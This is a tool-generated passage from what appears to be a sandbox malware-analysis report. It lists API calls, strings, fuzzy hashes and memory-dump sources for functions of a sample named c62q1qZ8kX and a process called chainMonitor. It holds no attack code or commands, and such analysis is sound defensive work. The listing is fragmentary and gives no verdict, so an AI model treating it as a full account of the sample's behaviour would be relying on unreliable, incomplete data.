                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction Fuzzy Hash: D501293200010CBBCF129F55CC11EEA3BBAFF69714F158018FE1866160C336E962EBA1
                APIs
                • GetDC.USER32(00000000), ref: 001E9DBE
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 001E9DCD
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001E9DDB
                • ReleaseDC.USER32(00000000,00000000), ref: 001E9DE9
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 9cfe9b4f9739aadeb8c637f728ae97daca0346624628e8927e099452d2b3ccc4
                • Instruction ID: d27b926cc0ce83f3ddf1a8eebdd12b859db87a029593fec5759ad8782be1b760
                • Opcode Fuzzy Hash: 9cfe9b4f9739aadeb8c637f728ae97daca0346624628e8927e099452d2b3ccc4
                • Instruction Fuzzy Hash: 9AE0EC31989B21E7D3245BA5BC4DB8B3B59AB29712F054005F60596190DE70444DCB95
                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 001F2016
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 001F201B
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 001F2020
                  • Part of subcall function 001F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 001F311F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 001F2035
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction ID: ba99dde8b88adc44a34a356122731ee548b007cd1bf0bae3dd14681748c79ec2
                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction Fuzzy Hash: D1C04C2610964CE41C113AB261031BE07401C737C4B9220C2FBA017143DF260A0AA037
                APIs
                  • Part of subcall function 001E9DF1: GetDC.USER32(00000000), ref: 001E9DF5
                  • Part of subcall function 001E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 001E9E00
                  • Part of subcall function 001E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 001E9E0B
                • GetObjectW.GDI32(?,00000018,?), ref: 001E9F8D
                  • Part of subcall function 001EA1E5: GetDC.USER32(00000000), ref: 001EA1EE
                  • Part of subcall function 001EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 001EA21D
                  • Part of subcall function 001EA1E5: ReleaseDC.USER32(00000000,?), ref: 001EA2B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: 4cb93403a2c8899b44787bf37f1219c6bce02df3d262d4b318388710b7b10752
                • Instruction ID: 8ac3bdca19b8f9e72582f4cebf26e74f2b5e304bee469e8d798ed7486e5fbe68
                • Opcode Fuzzy Hash: 4cb93403a2c8899b44787bf37f1219c6bce02df3d262d4b318388710b7b10752
                • Instruction Fuzzy Hash: A1811071208754AFC714DF69D848A2EBBE9FF88704F00891DF98AD7261DB31AD05CB62
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: 65de7b1c9c39de172c6bc14d2a305a9c0d40933c4963fb2ecc415c05dad9fbfd
                • Instruction ID: 14d727d87baff0c56b34ee74ed338155b9fe1e1bd16da4050db12023f1c4b2e0
                • Opcode Fuzzy Hash: 65de7b1c9c39de172c6bc14d2a305a9c0d40933c4963fb2ecc415c05dad9fbfd
                • Instruction Fuzzy Hash: CA51C93124CFC0FAEA2A16D6DC42F3E7666AB1CB00F264916F39A744D5C7F254E06612
                APIs
                • __EH_prolog.LIBCMT ref: 001D7730
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001D78CC
                  • Part of subcall function 001DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001DA27A,?,?,?,001DA113,?,00000001,00000000,?,?), ref: 001DA458
                  • Part of subcall function 001DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001DA27A,?,?,?,001DA113,?,00000001,00000000,?,?), ref: 001DA489
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: d035d97d281c5d02b377e34de1f62c486676f76b135668f2bdedd7a1175decb9
                • Instruction ID: e0aaa06483c1086e054e61ebde0afa468d8ef6f5080c7b389931ebe6a47babc9
                • Opcode Fuzzy Hash: d035d97d281c5d02b377e34de1f62c486676f76b135668f2bdedd7a1175decb9
                • Instruction Fuzzy Hash: 2E418571805268AADB24EB50DD59EEEB37CAF55300F0041DBB609A3292EB745F84DF61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: 83d30d4643e0e4c9d3bc4876e30cfa738c8635de5d0aa9fc13153a5003bbf51c
                • Instruction ID: 0089eedab91d7405262caae2eda7917b1c583e8c17550882cfd690b48cb096d9
                • Opcode Fuzzy Hash: 83d30d4643e0e4c9d3bc4876e30cfa738c8635de5d0aa9fc13153a5003bbf51c
                • Instruction Fuzzy Hash: 4F419435404259EBCF20AF21DCC1EEF77ADAF55750B12406BF81697392E770DA50CA60
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: b6a8e6bedaf6c48ad5b133f36b6a14906c22458358449f74df9a53c5168a432d
                • Instruction ID: b52ba4e8333e133e60c001a4b259f4b08e05bc32b6b4e8cd3ccdab4b6215755c
                • Opcode Fuzzy Hash: b6a8e6bedaf6c48ad5b133f36b6a14906c22458358449f74df9a53c5168a432d
                • Instruction Fuzzy Hash: FA219F71214B849FCB18EF66D895A2E77A8FF84711B14856EF9098F282DF70EC00CB60
                APIs
                • DialogBoxParamW.USER32(GETPASSWORD1,0001043C,001EA990,?,?), ref: 001ED4C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: DialogParam
                • String ID: GETPASSWORD1$xj"
                • API String ID: 665744214-2354614350
                • Opcode ID: c27a7df59ce218724381711580b8992c23e70cdb5839472e333fc0e1fd08c751
                • Instruction ID: 748443df3ab9056a31ce9ff9720f48b3c727aed36c560883b761636b9d382e8d
                • Opcode Fuzzy Hash: c27a7df59ce218724381711580b8992c23e70cdb5839472e333fc0e1fd08c751
                • Instruction Fuzzy Hash: 72115E71614684ABDB21DE35BC49BEF37E8BB15350F198074BD45A71D1CBB0AC54C760
                APIs
                  • Part of subcall function 001DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001DEB92
                  • Part of subcall function 001DEB73: GetProcAddress.KERNEL32(002181C0,CryptUnprotectMemory), ref: 001DEBA2
                • GetCurrentProcessId.KERNEL32(?,?,?,001DEBEC), ref: 001DEC84
                Strings
                • CryptUnprotectMemory failed, xrefs: 001DEC7C
                • CryptProtectMemory failed, xrefs: 001DEC3B
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: b072588d33b052f0e45e0b7dbc30b554c32c3556a1d4c0128ea3cada6b778f5d
                • Instruction ID: 7e5a0ca982a54f9024662dfc200776be61f6bd2ae86b97461ec23e5fefde3d01
                • Opcode Fuzzy Hash: b072588d33b052f0e45e0b7dbc30b554c32c3556a1d4c0128ea3cada6b778f5d
                • Instruction Fuzzy Hash: 78117F32A203186FDB15BB34DC466AE3798EF14721B04801BFC055F382CB75AD4187D0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free
                • String ID: X
                • API String ID: 269201875-3831130985
                • Opcode ID: c0dc8496647a80c707ca846f670655847d588912b00f205faaa84964253390c4
                • Instruction ID: f13743735e847668b6fcf6039eef9025b481cb634a7000d7f6b95b17f58b0679
                • Opcode Fuzzy Hash: c0dc8496647a80c707ca846f670655847d588912b00f205faaa84964253390c4
                • Instruction Fuzzy Hash: 55119D71A103259BEB24AB38BC49F773695AB61730F140626FA21CA2E1E774C8528680
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001EF25E
                • ___raise_securityfailure.LIBCMT ref: 001EF345
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8#
                • API String ID: 3761405300-3270533637
                • Opcode ID: 29b813825dd9f463bd92f531d8ecc6969c90c0ebbe087abbe737f2cc843608d6
                • Instruction ID: d32216d1b0a1e4a2aa62c58828c6fccc7dd73f06308c2c86b5670552ee792b9c
                • Opcode Fuzzy Hash: 29b813825dd9f463bd92f531d8ecc6969c90c0ebbe087abbe737f2cc843608d6
                • Instruction Fuzzy Hash: E32134B97103048BD718EF55F9E9A043BE8FB4C310F10586AE9088B7A1E3B1A981CF65
                APIs
                • CreateThread.KERNEL32(00000000,00010000,001E09D0,?,00000000,00000000), ref: 001E08AD
                • SetThreadPriority.KERNEL32(?,00000000), ref: 001E08F4
                  • Part of subcall function 001D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D6EAF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                • Opcode ID: 8d9052dcd50672ed34a3069827a4ece195fa9d6fe23d9b01ce56de1a7aaf6230
                • Instruction ID: 7483b9bf7b1097d650801f82390eae27a64090f2c9ece96f5363ff5d5125c568
                • Opcode Fuzzy Hash: 8d9052dcd50672ed34a3069827a4ece195fa9d6fe23d9b01ce56de1a7aaf6230
                • Instruction Fuzzy Hash: 6B01D6B13447056FD631AF55EC86FAA7398EB58715F10042EFA8A92181CFE1A8C19664
                APIs
                  • Part of subcall function 001F8FA5: GetLastError.KERNEL32(?,00210EE8,001F3E14,00210EE8,?,?,001F3713,00000050,?,00210EE8,00000200), ref: 001F8FA9
                  • Part of subcall function 001F8FA5: _free.LIBCMT ref: 001F8FDC
                  • Part of subcall function 001F8FA5: SetLastError.KERNEL32(00000000,?,00210EE8,00000200), ref: 001F901D
                  • Part of subcall function 001F8FA5: _abort.LIBCMT ref: 001F9023
                • _abort.LIBCMT ref: 001FB2E0
                • _free.LIBCMT ref: 001FB314
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorLast_abort_free
                • String ID:
                • API String ID: 289325740-771276903
                • Opcode ID: aa110fc49cbc0116a7615ab50afabbadc0d7a17c9a7a7d99b118c522d4b4981b
                • Instruction ID: 47f91724b46ce19d696909a41b51eeb8875a9994f2d7c0bfb87c91de8b2407db
                • Opcode Fuzzy Hash: aa110fc49cbc0116a7615ab50afabbadc0d7a17c9a7a7d99b118c522d4b4981b
                • Instruction Fuzzy Hash: 9A01C071D05B29DFCB25AF59D88127DB374FF18B21B0A050AE62067682CB302D428FC2
                APIs
                  • Part of subcall function 001DDA98: _swprintf.LIBCMT ref: 001DDABE
                  • Part of subcall function 001DDA98: _strlen.LIBCMT ref: 001DDADF
                  • Part of subcall function 001DDA98: SetDlgItemTextW.USER32(?,0020E154,?), ref: 001DDB3F
                  • Part of subcall function 001DDA98: GetWindowRect.USER32(?,?), ref: 001DDB79
                  • Part of subcall function 001DDA98: GetClientRect.USER32(?,?), ref: 001DDB85
                • GetDlgItem.USER32(00000000,00003021), ref: 001D134F
                • SetWindowTextW.USER32(00000000,002035B4), ref: 001D1365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                • Opcode ID: eaefda52cac060bf96cc481385f37b7d50b2fbb7719a542aa2ed1029b3e25715
                • Instruction ID: 91cbed0e4f7f7839fd413fb79430888a52b72d126a8a6767440b4c09b35e8382
                • Opcode Fuzzy Hash: eaefda52cac060bf96cc481385f37b7d50b2fbb7719a542aa2ed1029b3e25715
                • Instruction Fuzzy Hash: C1F0AF3010038CB6DF254F619D0DBE93B98BB24315F088416FD89556A2C774C995EB10
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,001E0A78,?), ref: 001E0854
                • GetLastError.KERNEL32(?), ref: 001E0860
                  • Part of subcall function 001D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D6EAF
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 001E0869
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 609c32ec20279b7008baa2ec6db76d2a54f3b2694c7c99ac3b965e1697e42282
                • Instruction ID: 1179413525d4505c689716cf9af4bc2173bbd419f09ab806b8c3588051a34306
                • Opcode Fuzzy Hash: 609c32ec20279b7008baa2ec6db76d2a54f3b2694c7c99ac3b965e1697e42282
                • Instruction Fuzzy Hash: 77D05B7190952126C6117724BC0EDAF7A095F62730F504716F639552F6DF71099141D5
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,001DD32F,?), ref: 001DDA53
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,001DD32F,?), ref: 001DDA61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: 1d50a5051e336c05a3c3a0d69d32e0a7c3152470e83e58f2a8ab7230b37967fc
                • Instruction ID: a321413d3e1fc1c11b87a3121bf9a481e91b134c6d8985aecc0b5075d8bbea5c
                • Opcode Fuzzy Hash: 1d50a5051e336c05a3c3a0d69d32e0a7c3152470e83e58f2a8ab7230b37967fc
                • Instruction Fuzzy Hash: BBC08C3238A750B6EB30A7317C0DB832E4D6B11F12F09044DF281DB6D2DAE5CA48C7A0
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: beb8f4523fc1faa99007f8295c7f29d0f5510f0a8c8edbaf5ab9bfe3bc87c1b5
                • Instruction ID: 5b6c09971901f83fe5e6049da7c6a225a5a5a83ddde3641f06e1e12fc603a850
                • Opcode Fuzzy Hash: beb8f4523fc1faa99007f8295c7f29d0f5510f0a8c8edbaf5ab9bfe3bc87c1b5
                • Instruction Fuzzy Hash: 94A19172A1994E8FEB98DB68C8657A97BE1FF59314F5001BED00DD72DACBB42801CB50
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe8244bc2b2e6f55f056fba1e7d0fdf09821d17a0382f8dbf1376df3866e4aab
                • Instruction ID: 9a217ed87450429d6cbf87c3055fe16e6b4b45d7cd77ff75f05c8fecb647081d
                • Opcode Fuzzy Hash: fe8244bc2b2e6f55f056fba1e7d0fdf09821d17a0382f8dbf1376df3866e4aab
